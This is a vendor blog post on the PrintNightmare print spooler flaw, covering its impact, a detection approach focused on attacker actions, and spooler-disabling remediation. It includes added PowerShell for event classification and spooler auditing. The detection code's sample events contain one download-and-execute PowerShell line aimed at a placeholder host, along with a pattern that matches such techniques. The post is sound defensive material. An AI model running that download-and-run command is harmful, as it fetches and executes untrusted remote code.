Exploit Background
At the start of this month, a proof of concept for a Microsoft print spooler vulnerability rocked Windows admins, causing a clamor to contain the worst of the damage. This vulnerability is covered under CVE-2021-34527.

Originally marked as a ‘low severity’ vulnerability, it was reclassified after a proof of concept showed the ease with which this patched vulnerability could be exploited for an easy escalation of privileges. In order to exploit this vulnerability, an attacker need only find a system with:

  • An enabled Print Spooler service
  • Network connectivity
  • A password for another user/account on the system, including system accounts

Notably, this vulnerability can allow for lateral movement and the acquisition of heightened privileges within the network. While this is concerning, its occurrence means that the attacker is already within the network and at a later phase in the kill chain.

Also of note is the fact that this vulnerability is limited to local privilege escalation only if the affected machines are patched. If they are not patched, the original remote code execution vulnerability is also still of concern.

There are now a multitude of proof of concepts in various languages. One such release is from user ‘anyu’ on Github, available here.

Impact
This vulnerability was raised to critical severity on July 6th for several reasons:

  • Networked attack - this is a much faster and more convenient vector than dealing with physical access
  • Low privileges required - even a guest account or system account (therefore an application) can take advantage
  • No user interaction necessary
  • No patch available

That said, the impact of a privilege escalation of this sort could be very severe, allowing for covert access to private data without raising an alarm. A privilege escalation of this type, spread far enough, can allow an attacker to push malicious software en masse to all networked machines or to access administrator controls to further its foothold in a network.

Automation Logic
Privilege escalation typically serves a few larger purposes for the attacker. In this case, an attacker may do one or more of the following:

  • Install/deploy additional accounts
  • Schedule cron jobs
  • Dump password hashes
  • Enable new services
  • Download and run new executables
  • Run malicious PowerShell scripts

Thankfully, existing LogicHub MDR detections already search for events of the above types, meaning that active exploitation of this vulnerability is already under direct monitoring and reporting. No additional infrastructure is required to ensure monitoring coverage against this CVE for MDR customers. (LogicHub SOAR customers who wish to implement these detections in their own environments should contact their customer service manager).
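As an added illustration (not LogicHub's detection content and not code from the original post), the following PowerShell classifies Windows events into the post-exploitation categories listed above. The event IDs are the standard Security, System and PowerShell Operational log IDs (4720 account created, 4698 scheduled task created, 7045/4697 service installed, 4688 process created, 4104 script block logged); the severity rules and the events in $SampleEvents are constructed for demonstration and are assumptions, not real telemetry.

```powershell
# Added example, not part of the original post: map Windows events onto the
# "actions on objective" categories listed above. $SampleEvents is constructed
# sample data; in production, pipe Get-WinEvent output into the function instead.

$Categories = @{
    4720 = 'Account created'                 # Security: a user account was created
    4698 = 'Scheduled task created'          # Security: a scheduled task was created
    7045 = 'New service installed'           # System: Service Control Manager installed a service
    4697 = 'New service installed'           # Security: service installed (requires audit policy)
    4688 = 'New process created'             # Security: process creation (requires audit policy)
    4104 = 'PowerShell script block logged'  # Microsoft-Windows-PowerShell/Operational
}

# Script-block content that raises a finding to High (assumed heuristics).
$SuspiciousScriptPattern = 'DownloadString|DownloadFile|FromBase64String|Invoke-Expression|\bIEX\b|-enc'

function Get-PostExploitationFinding {
    [CmdletBinding()]
    param(
        # Objects shaped like Get-WinEvent output: Id, ProviderName, MachineName, TimeCreated, Message
        [Parameter(Mandatory, ValueFromPipeline)] $Record
    )
    process {
        $category = $Categories[[int]$Record.Id]
        if (-not $category) { return }      # event type not tracked by this logic

        $severity = 'Medium'
        if ($Record.Id -eq 4104 -and $Record.Message -match $SuspiciousScriptPattern) {
            $severity = 'High'
        }
        # A service or process binary under a user-writable path is treated as
        # more suspicious than one under Program Files or System32 (assumption).
        if (($Record.Id -in 7045, 4697, 4688) -and
            ($Record.Message -match '\\(Temp|Users\\Public|AppData)\\')) {
            $severity = 'High'
        }

        [pscustomobject]@{
            Time     = $Record.TimeCreated
            Computer = $Record.MachineName
            EventId  = $Record.Id
            Category = $category
            Severity = $severity
            Summary  = ($Record.Message -split "`r?`n")[0]
        }
    }
}

# Constructed sample events (not real log data).
$SampleEvents = @(
    [pscustomobject]@{ TimeCreated = '2021-07-06 10:01'; Id = 4720; MachineName = 'WS01'
                       ProviderName = 'Microsoft-Windows-Security-Auditing'
                       Message = "A user account was created.`r`nNew Account:`r`n`tAccount Name:`t`tsvc_helpdesk2" }
    [pscustomobject]@{ TimeCreated = '2021-07-06 10:02'; Id = 7045; MachineName = 'WS01'
                       ProviderName = 'Service Control Manager'
                       Message = "A service was installed in the system.`r`nService File Name: C:\Users\Public\update.exe" }
    [pscustomobject]@{ TimeCreated = '2021-07-06 10:03'; Id = 4104; MachineName = 'WS01'
                       ProviderName = 'Microsoft-Windows-PowerShell'
                       Message = "Creating Scriptblock text (1 of 1):`r`nIEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')" }
    [pscustomobject]@{ TimeCreated = '2021-07-06 10:04'; Id = 4624; MachineName = 'WS01'
                       ProviderName = 'Microsoft-Windows-Security-Auditing'
                       Message = 'An account was successfully logged on.' }   # not in scope, dropped
)

$SampleEvents | Get-PostExploitationFinding | Format-Table -AutoSize
```

Against the sample data this yields three findings (account created, new service under C:\Users\Public rated High, and a High-rated script block) and silently drops the logon event. To run it on live data, replace $SampleEvents with, for example, Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4698, 4697, 4688 } and the equivalent queries for the System and PowerShell Operational logs.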

According to LogicHub Threat Detection Lead Anthony Morris, this may be one of the best ways to detect vulnerabilities of this type.

“The focus of my detection content is not to detect any of the 5,152 things that emerged in the last 3 months, of which this is just two of them... the focus of the detection content is to identify malicious actors acting on objectives.”

Considering the high number of CVEs that are added to monitoring daily, it makes sense to focus on the ‘what’ (that is, the events that occur) rather than the ‘how’ (specific CVEs and methodology). While knowing popular methods of action is important, a mountain of separate CVE detections, especially for this sort of vulnerability, may only complicate how active events are found. In the end, the largest concern of any monitoring team is the result of the actions on the objective.

Remediation
PrintNightmare targets users with an enabled Print Spooler service, so office environments and those who use printers most often (or even the Print to PDF feature) should take extra care, as they cannot disable the service. These machines should be carefully monitored and their network connections limited. The following methods disable Print Spooler via PowerShell on a single machine or via GPO:

PowerShell (from an elevated session):
  Stop-Service -Name Spooler -Force
  Set-Service -Name Spooler -StartupType Disabled

GPO: adjust the Print Spooler service under “Policies/Windows Settings/Security Settings/System Services/Print Spooler”

All administrators should also ensure that Print Spooler is turned off completely on machines that do not need it, and that all roles and users follow the ‘least privilege’ access ideology. The access control list on the ‘System32/spool/drivers’ directory should also be restricted, given that no other restrictions are possible.
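The following PowerShell, an added example that is not from the original post, turns the two remediation steps above into an audit-then-act script for a single machine: it reports whether the spooler is running, who holds write access on the spool drivers directory, and disables the service only when the host has no configured printers. The "no configured printers means no spooler dependency" rule and the function names are assumptions for this example; Get-Printer comes from the PrintManagement module that ships with Windows 8 / Server 2012 and later.

```powershell
# Added example, not part of the original post: audit Print Spooler exposure on
# the local machine and disable the service when nothing depends on it.
# Run from an elevated PowerShell session.

function Get-SpoolerExposure {
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $driversPath = Join-Path $env:SystemRoot 'System32\spool\drivers'

    # Identities holding any write-type permission on the drivers directory,
    # which the post recommends restricting where the service must stay on.
    $writers = @()
    if (Test-Path $driversPath) {
        $writers = (Get-Acl -Path $driversPath).Access |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                ($_.FileSystemRights -match 'Write|Modify|FullControl')
            } |
            ForEach-Object { $_.IdentityReference.Value } |
            Sort-Object -Unique
    }

    [pscustomobject]@{
        ComputerName   = $env:COMPUTERNAME
        SpoolerPresent = [bool]$svc
        Status         = if ($svc) { $svc.Status.ToString() } else { 'n/a' }
        StartupType    = if ($svc) { $svc.StartType.ToString() } else { 'n/a' }
        DriversPath    = $driversPath
        WritableBy     = ($writers -join ', ')
        # A running spooler is the reachable attack surface for this CVE.
        Exposed        = [bool]($svc -and $svc.Status -eq 'Running')
    }
}

function Disable-PrintSpooler {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    # Same two commands as the manual remediation step, guarded by -WhatIf/-Confirm.
    if ($PSCmdlet.ShouldProcess('Print Spooler', 'Stop and set StartupType=Disabled')) {
        Stop-Service -Name Spooler -Force
        Set-Service -Name Spooler -StartupType Disabled
    }
    Get-SpoolerExposure
}

$before = Get-SpoolerExposure
$before | Format-List

# Assumption for this example: a host with no configured printers (Print to PDF
# counts as one) has no spooler dependency and can have the service disabled.
$printerCount = (Get-Printer -ErrorAction SilentlyContinue | Measure-Object).Count
if ($before.Exposed -and $printerCount -eq 0) {
    Disable-PrintSpooler -WhatIf   # remove -WhatIf to apply the change
} elseif ($before.Exposed) {
    Write-Warning "Spooler running with $printerCount printer(s) configured; review WritableBy and tighten the ACL instead."
}
```

The WritableBy field is what to review on machines that must keep printing: any broadly granted write or modify right on the drivers directory is the permission the post suggests limiting. Run the script with -WhatIf first across a sample of hosts to see which ones would be changed before applying it through a management tool.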

The PrintNightmare vulnerability has no known full remediation and is of foremost concern due to active exploitation in the wild.

Recommended Sources
Afwu. “Afwu/PrintNightmare.” GitHub, 2021, github.com/afwu/PrintNightmare.

Hammond, John. “Critical Vulnerability: PrintNightmare Exposes Windows Servers to Remote Code Execution.” Huntress, 2021, www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution.

Naraine, Ryan. “Windows Admins Scrambling to Contain 'PrintNightmare' Flaw Exposure.” SecurityWeek, 2021, www.securityweek.com/windows-admins-scrambling-contain-printnightmare-flaw-exposure.

Sandbu, Marius. “PrintNightmare – CVE-2021-1675.” Marius Sandbu (Personal Portfolio), 6 July 2021, webcache.googleusercontent.com/search?q=cache%3AMi7jr9K3R6UJ%3Ahttps%3A%2F%2Fmsandbu.org%2Fprintnightmare-cve-2021-1675%2F%2B&cd=2&hl=en&ct=clnk&gl=us.

“Security Update Guide - CVE-2021-34527.” Microsoft Security Response Center, 2021, msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527.